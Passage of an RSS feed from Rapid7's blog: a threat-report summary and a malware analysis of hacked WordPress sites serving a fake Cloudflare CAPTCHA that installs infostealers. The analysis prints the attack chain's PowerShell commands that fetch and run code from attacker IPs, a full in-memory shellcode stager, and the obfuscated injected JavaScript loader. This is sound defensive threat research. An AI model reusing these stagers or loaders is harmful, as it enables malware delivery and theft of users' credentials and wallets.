      <description><![CDATA[<p>The predictive window has collapsed. </p><p>In 2025, high-impact vulnerabilities weren’t quietly accumulating risk. They were operationalized, and often within days.</p><p style="direction: ltr;"><span style='font-size: undefined;'>Today, Rapid7 Labs released the </span><a href="https://www.rapid7.com/research/report/global-threat-landscape-report-2026/" target="_blank"><span style='font-size: undefined;'>2026 Global Threat Landscape Report</span></a><span style='font-size: undefined;'>, an in-depth analysis of how attacker behavior is evolving across vulnerability exploitation, ransomware operations, identity abuse, and AI-driven tradecraft. The data shows a clear pattern: exposure is being identified and weaponized faster than most organizations are set up to defend.</span></p><h2 style="direction: ltr;">From disclosure to exploitation in days, not weeks</h2><p style="direction: ltr;"><span style='font-size: undefined;'>In 2025, confirmed exploitation of newly disclosed CVSS 7–10 vulnerabilities increased 105% year over year, rising from 71 to 146. The median time from publication to inclusion in CISA’s Known Exploited Vulnerabilities list fell from 8.5 days to 5.0 days.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>At the same time, the number of high-probability vulnerabilities that remained unexploited dropped sharply. The buffer that once allowed teams to triage and schedule remediation is shrinking to the point where some severe flaws were seen to have been exploited almost immediately.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>The broader trend is unmistakable: vulnerability management programs built around reactive remediation cycles are struggling to keep pace with adversaries operating at machine speed.</span></p><h2 style="direction: ltr;">Cybercrime as a structured market</h2><p style="direction: ltr;"><span style='font-size: undefined;'>Cybercrime in 2025 no longer resembles chaotic hacking. It resembles platform capitalism.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>The report highlights how the underground economy now mirrors legitimate SaaS ecosystems. Initial Access Brokers obtain and validate network footholds. Ransomware operators focus on encryption and extortion. Infostealer operators sell subscription-style access to fresh credential logs.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>This specialization lowers barriers to entry and increases scale creating a supply chain in which access is acquired, packaged, priced, and sold to anyone who wants it. </span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Ransomware is a good example of this business maturity. It was present in 42% of Rapid7 MDR investigations in 2025 with leak posts increasing 46.4% year over year, and the number of active groups growing from 102 to 140. That kind of growth is anything but random or coincidental: it is an indication of systemic changes to the ransomware ecosystem indicating growing sophistication, specialization, and, ultimately, risk. </span></p><h2 style="direction: ltr;">Logging in, not breaking in</h2><p style="direction: ltr;"><span style='font-size: undefined;'>Authentication-based attacks remain incredibly common as the lack of consistency across organizations can lead to easy exploitation. Valid accounts without multi-factor authentication (MFA) were responsible for 43.9% of incidents over that year. Rather than forcing their way past defenses, attackers increasingly authenticate with stolen credentials, hijacked sessions, or abused tokens. This is where the increase in AI-driven attacks is particularly acute with the benefits generative AI can play in improving the maturity and sophistication of social engineering attacks. </span></p><p style="direction: ltr;"><span style='font-size: undefined;'>As enterprises extend trust across cloud platforms, SaaS ecosystems, APIs, and remote work environments, authentication systems have become the backbone of operational control. This represents a structural shift with the control layer of cyber risk moving away from network perimeters toward authentication flows.</span></p><h2 style="direction: ltr;">Attacks are using reliable vectors, just at alarming speeds</h2><p style="direction: ltr;"><span style='font-size: undefined;'>One hallmark of the attack landscape in 2025 was the use of tried and true attack vectors rather than novel exploits and zero-day vulnerabilities. CVE disclosures continued to climb last year, but confirmed exploitation clustered around dependable weakness types like deserialization, authentication bypass, and memory corruption vulnerabilities.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Attackers are targeting flaws that enable pre-authentication access, repeatable execution, and rapid data theft. They are not, necessarily, chasing every vulnerability. Just the ones they deem reliable. This pattern reinforces a key theme of the report: exploitability and context matter more than raw volume.</span></p><h2 style="direction: ltr;">AI as an accelerant</h2><p style="direction: ltr;"><span style='font-size: undefined;'>AI is serving as a force multiplier and an expanding attack surface at the same time. </span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Generative AI is accelerating established attack methods by reducing the time, skill, and coordination previously required to execute them at scale. Rather than introducing entirely new categories of exploitation, threat actors are integrating AI into existing workflows to industrialize phishing, automate reconnaissance, and refine malicious scripts with greater speed and precision. </span></p><p style="direction: ltr;"><span style='font-size: undefined;'>AI-assisted phishing campaigns were more polished and tailored to specific industries or executive roles, reflecting a measurable improvement in personalization and believability. They accelerated open-source intelligence collection to create details from fragmented data. AI was used to troubleshoot malware development in near real time, effectively compressing the cycle between initial research and malware deployment. The result is not radical technical innovation, but efficiency, speed, and fewer missed opportunities. </span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Meanwhile, AI platforms themselves are emerging as targets with model servers, orchestration frameworks, and token-based integrations, inheriting familiar weaknesses such as unsafe deserialization and weak authentication. As organizations operationalize AI quickly, governance gaps create new high-impact pathways to risk.</span></p><h2 style="direction: ltr;">The geography of attacks</h2><p style="direction: ltr;"><span style='font-size: undefined;'>When it comes to targeted regions, no area of the globe represents a better convergence of exposure and financial opportunity than North America. Organizations on this continent accounted for 82.04% of observed incidents, with the United States representing roughly 70% of leak posts on ransomware leak sites. Manufacturing, business services, and retail were among the most targeted industries as these sectors often combine operational dependence, sensitive data, and financial leverage making them fat targets for attackers looking for reliability not only in their attack vectors, but in gains available from their chosen targets. </span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Across criminal and state-aligned activity, attackers are converging on identity systems, edge infrastructure, collaboration platforms, and cloud control planes where trust, scale, and business continuity intersect.</span></p><h2 style="direction: ltr;">What this means for security leaders</h2><p style="direction: ltr;"><span style='font-size: undefined;'>There is a sobering reality in this year’s data: the underlying weaknesses remain familiar. Weak credentials. Social engineering. Exposed services. Unpatched edge infrastructure.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>What has changed is the speed.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Security programs can no longer rely on moving slightly faster than attackers. The model must shift toward reducing exposure before it is operationalized.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>That means:</span></p><ul><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Continuous exposure visibility with contextual prioritization</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Strong MFA enforcement and hardened identity controls</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Protected and monitored edge infrastructure</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Governance around AI systems and integrations</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>AI-enabled security workflows capable of matching attacker velocity</span></p></li></ul><p style="direction: ltr;"><span style='font-size: undefined;'>The organizations that maintain clear, continuous insight into their exposure - and reduce it before it is monetized - will be best positioned to manage risk in this accelerated cycle.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>The question is no longer whether exposure exists.</span><br/><span style='font-size: undefined;'> It is whether you can reduce it before attackers capitalize on it.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Read the full </span><a href="https://www.rapid7.com/research/report/global-threat-landscape-report-2026/" target="_blank"><span style='font-size: undefined;'>Rapid7 2026 Threat Landscape Report</span></a><span style='font-size: undefined;'> to explore the data and strategic implications in detail.</span></p>]]></description>
      <link>https://www.rapid7.com/blog/post/tr-accelerating-attack-cycle-2026-global-threat-landscape-report</link>
      <guid isPermaLink="false">blt8486bbe6b6d7f8c7</guid>
      <category><![CDATA[Research]]></category>
      <category><![CDATA[Labs]]></category>
      <category><![CDATA[Threat Intel]]></category>
      <category><![CDATA[Emerging Threats]]></category><dc:creator><![CDATA[Rapid7 Labs]]></dc:creator>
      <pubDate>Wed, 18 Mar 2026 13:00:00 GMT</pubDate><media:content url="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltb5f320e7f08dcc1c/69b94e70daccab6b3b0b91ca/card-threat-landscape-report-2026.webp" medium="image" />
    </item>
    <item>
      <title><![CDATA[When Trusted Websites Turn Malicious: WordPress Compromises Advance Global Stealer Operation]]></title>
      <description><![CDATA[<h2><span style='font-size: undefined;'>Overview</span></h2><p><span style='font-size: undefined;'>Rapid7 Labs has identified and analyzed an ongoing, widespread compromise of legitimate, potentially highly trusted WordPress websites, misused by an unidentified threat actor to inject a ClickFix implant impersonating a Cloudflare human verification challenge (CAPTCHA). The lure is designed to infect visitors with a multi-stage malware chain that ultimately steals and exfiltrates credentials and digital wallets from Windows systems. The stolen credentials can subsequently be used for financial theft or to conduct further, more targeted attacks against organizations.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>The campaign we have analyzed has been active in this exact form since December 2025, although some of the infrastructure (e.g., domain names) date back to July/August 2025. At time of publication, we have identified more than 250 distinct infected websites spanning at least 12 countries: Australia, Brazil, Canada, Czechia, Germany, India, Israel, Singapore, Slovakia, Switzerland, the UK, and the US.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>The infected websites include regional news outlets, local business websites, and in one case even a United States Senate candidate’s official webpage (we have notified US authorities about this finding, so that they can confirm the compromise has been remediated). This legitimacy, together with the convincing appearance of the fake Cloudflare CAPTCHA lure, makes this threat dangerous for organizations and individuals alike. It also highlights the importance of staying vigilant online at all times, not only when browsing untrustworthy sites. While the threat actor doesn’t employ particular stealth at the present time, the malware chain is executed almost entirely in memory and in the context of inconspicuous Windows processes, making traditional file-based detection ineffective.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>In this blog, we provide an in-depth technical analysis of the complete infection chain, from the first compromised website load, through obfuscated JavaScript, several PowerShell stagers and in-memory shellcode loaders, to several final infostealer payloads observed within the last month: An evolved variant of Vidar stealer, an unnamed .NET stealer we are calling Impure Stealer, and a new C++ stealer, which we believe to be specific to this campaign, and which has been dubbed VodkaStealer. Furthermore, we publish an extensive list of IoCs and YARA detection rules, as well as various resources for unpacking the loader shellcode and algorithms to decrypt stealer configurations, so that defenders can stay ahead of this threat.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Besides the IoCs and detection rules published here, customers with access to Rapid7’s Intelligence Hub will continue to receive the newest intelligence regarding this campaign, as well as individual infostealer families, including (but not limited to) Vidar and Impure Stealer.</span>⠀</p><figure style="margin: 0"><div style="display: inline-block"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blta258eca111bf7254/69af1c57cd033a00088912d4/01-attack-chain.jpg" alt="01-attack-chain.jpg" caption="Figure 1: Overview of the attack chain" class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="01-attack-chain.jpg" style="width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blta258eca111bf7254/69af1c57cd033a00088912d4/01-attack-chain.jpg" data-sys-asset-uid="blta258eca111bf7254" data-sys-asset-filename="01-attack-chain.jpg" data-sys-asset-contenttype="image/jpeg" data-sys-asset-caption="Figure 1: Overview of the attack chain" data-sys-asset-alt="01-attack-chain.jpg" data-sys-asset-position="none" sys-style-type="display"/><figcaption style="text-align:center">Figure 1: Overview of the attack chain</figcaption></div></figure><h2>First sight: Tracing the infection chain</h2><p style="direction: ltr;"><span style='font-size: undefined;'>Our investigation started following an incident handled by Rapid7’s MDR team on January 23rd, 2026. The initial alert indicated the following command being executed on the user’s machine.</span>⠀</p><pre language="powershell">powershell -c iex(irm 91.92.240[.]219 -UseBasicParsing)</pre><p style="direction: ltr;"><span style='font-size: undefined;'>Consequently, another similar command was executed by a child process:</span></p><pre language="powershell">"powershell.exe" -Command "try {
    $finalPayload = iwr -Uri "178.16.53[.]70" -UseBasicParsing
    Invoke-Expression $finalPayload.Content
} catch {
}"</pre><p style="direction: ltr;"><span style='font-size: undefined;'>Rapid7 acquired the user browser history and observed that the user previously navigated to the url </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>hxxps[://]phatapunjab[.]pk/new-pta-tax-for-used-iphone-15-series/</span></span><span style='font-size: undefined;'> after doing a google search for a related query. At the time, Rapid7 analysts noted that the domain </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>phatapunjab[.]pk</span></span><span style='font-size: undefined;'> was created only a month ago, and so this incident seemed like a classic case of a malicious website poisoning SEO to attract visitors and infect them with malware using ClickFix techniques.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>We retrieved and analyzed the next-stage PowerShell script from </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>178.16.53[.]70</span></span><span style='font-size: undefined;'>. Its purpose was to download a shellcode blob (named </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>cptch.bin</span></span><span style='font-size: undefined;'>) from yet another remote server, </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>94.154.35[.]115</span></span><span style='font-size: undefined;'>, and execute it utilizing the </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>VirtualAlloc</span></span><span style='font-size: undefined;'> and </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>CreateThread</span></span><span style='font-size: undefined;'> Windows APIs — a standard process injection technique designed to execute malware in memory without touching the disk. The shellcode unpacked a loader that would download yet another shellcode blob from the same server (this time named </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>cptchbuild.bin</span></span><span style='font-size: undefined;'>) and execute it injected into a native </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>svchost.exe</span></span><span style='font-size: undefined;'> process. The final payload embedded in the second shellcode blob turned out to be a Vidar stealer sample, which we'll discuss later in this blog.</span></p><pre language="powershell">$u = "hxxp[://]94.154.35[.]115/user_profiles_photo/cptch.bin"

try {
    Write-Host "Loading..." 

    $d = Invoke-WebRequest -Uri $u -UseBasicParsing -ErrorAction Stop
    $b = $d.Content
    $s = $b.Length

    $c = @"
using System;
using System.Runtime.InteropServices;
public class W {
    [DllImport("kernel32.dll", SetLastError=true)]
    public static extern IntPtr GetCurrentProcess();
    [DllImport("kernel32.dll", SetLastError=true)]
    public static extern IntPtr VirtualAlloc(IntPtr a, uint sz, uint t, uint p);
    [DllImport("kernel32.dll", SetLastError=true)]
    public static extern IntPtr CreateThread(IntPtr ta, uint ss, IntPtr sa, IntPtr p, uint cf, out uint tid);
    [DllImport("kernel32.dll", SetLastError=true)]
    public static extern uint WaitForSingleObject(IntPtr h, uint ms);
}
"@

    Add-Type -TypeDefinition $c

    $m1 = 0x1000
    $m2 = 0x2000
    $p = 0x40

    $addr = [W]::VirtualAlloc([IntPtr]::Zero, $s, $m1 -bor $m2, $p)

    if ($addr -eq [IntPtr]::Zero) {
        throw "Alloc failed"
    }

    [System.Runtime.InteropServices.Marshal]::Copy($b, 0, $addr, $s)

    $tid = 0
    $th = [W]::CreateThread([IntPtr]::Zero, 0, $addr, [IntPtr]::Zero, 0, [ref]$tid)

    if ($th -eq [IntPtr]::Zero) {
        throw "Thread failed"
    }

    [W]::WaitForSingleObject($th, 30000) | Out-Null
    Write-Host "done."

} catch {
    Write-Error $_.Exception.Message
    exit 1
}</pre><p style="text-align: center;direction: ltr;"><span style='font-size: undefined;'><em>Figure 2: PowerShell stager executing remote shellcode in memory</em></span></p><p><span style='font-size: undefined;'>On February 3rd, an almost identical case was handled by Rapid7 in another customer’s environment. Just like in the previous case, a PowerShell command was executed and shellcode was downloaded from </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>hxxp[://]94.154.35[.]115/user_profiles_photo/cptch.bin</span></span><span style='font-size: undefined;'>; however, this time, the final payload was different. Instead of Vidar, a .NET stealer was encrypted in the second shellcode blob.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>This time, the MDR team identified the ClickFix infection source as website </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>missionloans[.]com</span></span><span style='font-size: undefined;'>, which is a significantly more established domain name and seems to belong to a legitimate US company.</span></p><figure style="margin: 0"><div style="display: inline-block"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltf46ddd1f8daf13bd/69af1c560e4ec100086cd2c3/02-missionloans-captcha.png" alt="02-missionloans-captcha.png" caption="Figure 3: Fake Cloudflare CAPTCHA shown on missionloans[.]com" class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="02-missionloans-captcha.png" style="width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltf46ddd1f8daf13bd/69af1c560e4ec100086cd2c3/02-missionloans-captcha.png" data-sys-asset-uid="bltf46ddd1f8daf13bd" data-sys-asset-filename="02-missionloans-captcha.png" data-sys-asset-contenttype="image/png" data-sys-asset-caption="Figure 3: Fake Cloudflare CAPTCHA shown on missionloans[.]com" data-sys-asset-alt="02-missionloans-captcha.png" data-sys-asset-position="none" sys-style-type="display"/><figcaption style="text-align:center">Figure 3: Fake Cloudflare CAPTCHA shown on missionloans[.]com</figcaption></div></figure><p>⠀</p><p><span style='font-size: undefined;'>Around the same time, malware analyst @ShadowOpCode on X (fka Twitter) </span><a href="https://x.com/ShadowOpCode/status/2016190716284690634" target="_blank"><span style='font-size: undefined;'>reported</span></a><span style='font-size: undefined;'> a similar case, where a Swiss website </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>wepro[.]ch</span></span><span style='font-size: undefined;'> was compromised and followed the exact same Vidar chain we’ve described above, and on February 17th, X user @James_inthe_box </span><a href="https://x.com/James_inthe_box/status/2023887918151197122" target="_blank"><span style='font-size: undefined;'>shared</span></a><span style='font-size: undefined;'> intelligence on a similar infection in </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>www[.]mrfpaint[.]com</span></span><span style='font-size: undefined;'>.</span></p><figure style="margin: 0"><div style="display: inline-block"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltda7843a630d56658/69af1c568da8010008537c44/03-mrfpaint-captcha.jpeg" alt="03-mrfpaint-captcha.jpeg" caption="Figure 4: Fake Cloudflare CAPTCHA shown on www[.]mrfpaint[.]com in a sandbox environment" class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="03-mrfpaint-captcha.jpeg" style="width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltda7843a630d56658/69af1c568da8010008537c44/03-mrfpaint-captcha.jpeg" data-sys-asset-uid="bltda7843a630d56658" data-sys-asset-filename="03-mrfpaint-captcha.jpeg" data-sys-asset-contenttype="image/jpeg" data-sys-asset-caption="Figure 4: Fake Cloudflare CAPTCHA shown on www[.]mrfpaint[.]com in a sandbox environment" data-sys-asset-alt="03-mrfpaint-captcha.jpeg" data-sys-asset-position="none" sys-style-type="display"/><figcaption style="text-align:center">Figure 4: Fake Cloudflare CAPTCHA shown on www[.]mrfpaint[.]com in a sandbox environment</figcaption></div></figure><p>⠀</p><p><span style='font-size: undefined;'>Noticing the similar pattern in all of these cases, which suggested the ClickFix infections originated from compromised legitimate websites, we wanted to research the mechanism behind the compromise and hunt for more compromised sites and the malicious scripts they load.</span></p><h2 style="direction: ltr;">Technical analysis: Dissecting the infection mechanism</h2><p style="direction: ltr;"><span style='font-size: undefined;'>Because none of the previously reported websites presented the ClickFix payload anymore at the time of our analysis, we opted to hunt for compromised sites by pivoting from domains hosting the ClickFix implant, which all resolved to the same IP address (</span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>94.154.35[.]152</span></span><span style='font-size: undefined;'>). We queried related URLs and noticed that many of them included a query parameter hinting at a possible referrer, or a compromised website loading the malicious content.</span></p><table><colgroup data-width='500'><col style="width:17.654028436018958%"/><col style="width:82.34597156398104%"/></colgroup><tbody><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Date</strong></span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>URL</strong></span></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'>2026/02/25</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>hxxps[://]gieable[.]shop</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>hxxps[://]namsioc[.]shop</span></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'>2026/02/21</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>hxxps[://]goarnsds[.]shop</span></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'>2026/02/19</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>hxxps[://]surveygifts[.]org</span></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'>2026/02/18</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>hxxps[://]gorscts[.]shop</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>hxxps[://]greecpt[.]shop/?ref=vifaexpo.com</span></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'>2026/02/17</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>hxxps[://]captoolsz[.]com/?ref=www.taylorautoservices.com</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>hxxps[://]greecpt[.]shop</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>hxxps[://]captoolsz[.]com/captcha.html</span></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'>2026/02/16</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>hxxps[://]captioz[.]shop/?ref=shmuelcohen.com</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>hxxps[://]namzcp[.]org/captcha.html</span></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'>2026/02/15</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>hxxps[://]cptoptious[.]com/?ref=agmagency.com</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>hxxps[://]cptoptious[.]com/?ref=www.violaobrasileiro.com.br</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>hxxps[://]cptoptious[.]com/?ref=fnbdubai.com</span></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'>2026/02/14</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>hxxps[://]captiort[.]shop/</span></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'>2026/02/06</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>hxxps[://]beta-charts[.]org/</span></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'>2026/02/03</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>hxxps[://]captioto[.]com/?ref=dakarailarriett.com</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>hxxps[://]capztoolz[.]com/?ref=www.de-eng.co.il</span></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'>2026/02/02</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>hxxps[://]cptoptious[.]com/?ref=latourfides.com</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>hxxps[://]capztoolz[.]com/?ref=www.bvd.co.il</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>hxxps[://]captioto[.]com/?ref=addvera.eu</span></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'>2026/02/01</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>hxxps[://]surveygifts[.]org/</span></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'>2026/01/29</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>hxxps[://]captolls[.]com/captcha.html</span></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'>2026/01/28</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>hxxps[://]cptoptious[.]com/?ref=www.renardetcaramel.com</span></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'>2026/01/27</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>hxxps[://]captiorweb[.]com/</span></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'>2026/01/22</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>hxxps[://]captiorweb[.]com/captcha.html</span></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'>2026/01/15</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>hxxps[://]cptoptious[.]com/?ref=www.tamireland.ie</span></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'>2026/01/12</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>hxxps[://]cptoptious[.]com/?ref=www.malam-payroll.com</span></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'>2026/01/10</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>hxxps[://]cptoptious[.]com/?ref=www.michiganautolaw.com</span></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'>2026/01/09</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>hxxps[://]cptoptious[.]com/captcha.htm</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>hxxps[://]cptoptious[.]com/?ref=engagenreap.com</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>hxxps[://]cptoptious[.]com/?ref=www.danneventhire.com.au</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>hxxps[://]cptoptious[.]com/?ref=proactivwellnesscenters.com</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>hxxps[://]cptoptious[.]com/?ref=topsoftwarecompanies.co</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>hxxps[://]cptoptious[.]com/?ref=bigenpakistan.com</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>hxxps[://]cptoptious[.]com/?ref=naturaltimberstone.com.au/</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>hxxps[://]cptoptious[.]com/?ref=alchemistpeptides.com</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>hxxps[://]cptoptious[.]com/?ref=nzimmigration.info/</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>hxxps[://]cptoptious[.]com/?ref=3plusa.net</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>hxxps[://]cptoptious[.]com/?ref=www.unigib.edu.gi</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>hxxps[://]cptoptious[.]com/?ref=janadventures.com</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>hxxps[://]cptoptious[.]com/?ref=blog.webrigo.com</span></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'>2026/01/01</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>hxxps[://]cptoptious[.]com/?ref=3plusa.net</span></p></td></tr></tbody></table><p><em>Table 1: </em><span style='font-size: undefined;'><em>URLs seen resolving to </em></span><span style='font-size: undefined;'><span data-type='inlineCode'><em>94.154.35[.]152</em></span></span></p><p><span style='font-size: undefined;'>At that point, none of the referring websites seemed to be infected (or actively being used by the attacker) anymore, either. However, using public data from </span><a href="http://urlscan.io" target="_blank"><span style='font-size: undefined;'>urlscan.io</span></a><span style='font-size: undefined;'> and the search query: </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>date:&gt;now-30d AND domain:(gorscts[.]shop OR greecpt[.]shop OR captiort[.]shop OR captioz[.]shop OR namzcp[.]org OR beta-charts[.]org OR captoolsz[.]com OR capztoolz[.]com OR surveygifts[.]org OR captolls[.]com OR captiorweb[.]com OR captioto[.]com OR cptoptious[.]com)</span></span><span style='font-size: undefined;'>, we were able to find past scans of compromised websites contacting one of the known ClickFix domains and inspect the HTTP responses.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>We determined that compromised websites included many potentially high-trust websites, as noted above. One striking thing all of these websites had in common was the use of the WordPress content management system (CMS), and in particular, nearly all of the websites publicly exposed an admin login panel. We checked a selection of these websites for known-vulnerable plugins or versions of WordPress itself, but no obvious common pattern was identified.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>One such scan we found was of an Australian online pharmacy website (</span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>hxxps[://]medsnsw[.]com/product/buy-xanax-alprazolam-australia/</span></span><span style='font-size: undefined;'>, </span><a href="https://urlscan.io/result/019c342b-f83e-757f-ab7a-5ed6c7ff5ad7/#transactions" target="_blank"><span style='font-size: undefined;'>urlscan.io scan</span></a><span style='font-size: undefined;'>). The recorded HTML response included the following script:</span></p><pre language="javascript">if(!window.__performance_optimizer_v6){
    window.__performance_optimizer_v6=true;
	if(!/wordpress_logged_in_/.test(document.cookie)){
		var perfEndpoints=["aHR0cHM6Ly9nb3ZlYW5ycy5vcmcvanNyZXBvP3JuZD0=","aHR0cHM6Ly9nZXRhbGliLm9yZy9qc3JlcG8\/cm5kPQ==","aHR0cHM6Ly9nb3ZlYXJhbGkub3JnL2pzcmVwbz9ybmQ9","aHR0cHM6Ly9saWdvdmVyYS5zaG9wL2pzcmVwbz9ybmQ9","aHR0cHM6Ly9hbGlhbnplZy5zaG9wL2pzcmVwbz9ybmQ9","aHR0cHM6Ly96dGRhbGl3ZWIuc2hvcC9qc3JlcG8\/cm5kPQ=="];
		function loadPerformanceScript(endpointIndex){
			if(endpointIndex&gt;=perfEndpoints.length)return;
			try{
				var endpointUrl=atob(perfEndpoints[endpointIndex])+Math.random();
				var performanceXHR=new XMLHttpRequest();
                performanceXHR.open("GET",endpointUrl,false);
                performanceXHR.send();
				if(performanceXHR.status==200){
					var optimizerScript=document.createElement("script");
                    optimizerScript.text=performanceXHR.responseText;
                    document.head.appendChild(optimizerScript)
                }else{
                    loadPerformanceScript(endpointIndex+1)
                }
            }catch(e){
                loadPerformanceScript(endpointIndex+1)
            }
        }
        loadPerformanceScript(0)
    }
